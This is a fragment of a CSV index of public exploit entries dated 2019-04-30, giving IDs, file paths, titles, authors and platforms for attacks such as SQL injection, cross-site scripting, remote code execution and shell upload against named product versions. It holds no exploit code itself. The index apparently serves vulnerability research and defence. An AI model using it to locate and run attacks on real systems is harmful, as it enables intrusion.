46764,exploits/hardware/webapps/46764.sh,"Netgear DGN2200 / DGND3700 - Admin Password Disclosure",2019-04-30,"Social Engineering Neo",webapps,hardware,
46765,exploits/ashx/webapps/46765.txt,"Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
46766,exploits/ashx/webapps/46766.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
46767,exploits/ashx/webapps/46767.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
46768,exploits/hardware/webapps/46768.sh,"Intelbras IWR 3000N - Denial of Service (Remote Reboot)",2019-04-30,"Social Engineering Neo",webapps,hardware,
46769,exploits/php/webapps/46769.txt,"Joomla! Component ARI Quiz 3.7.4 - SQL Injection",2019-04-30,"Mr Winst0n",webapps,php,80
46770,exploits/hardware/webapps/46770.html,"Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery",2019-04-30,"Social Engineering Neo",webapps,hardware,
46771,exploits/php/webapps/46771.txt,"HumHub 1.3.12 - Cross-Site Scripting",2019-04-30,"Kağan EĞLENCE",webapps,php,80
46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888
46773,exploits/multiple/webapps/46773.py,"Domoticz 4.10577 - Unauthenticated Remote Command Execution",2019-04-30,"Fabio Carretto",webapps,multiple,
46774,exploits/php/webapps/46774.txt,"Joomla! Component JiFile 2.3.1 - Arbitrary File Download",2019-04-30,"Mr Winst0n",webapps,php,80
46776,exploits/php/webapps/46776.txt,"Hyvikk Fleet Manager - Shell Upload",2019-04-30,saxgy1331,webapps,php,
46777,exploits/php/webapps/46777.txt,"Agent Tesla Botnet - Information Disclosure",2019-04-30,n4pst3r,webapps,php,
46780,exploits/windows/webapps/46780.py,"Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution",2019-04-30,"Avinash Kumar Thapa",webapps,windows,

Can't render this file because it is too large.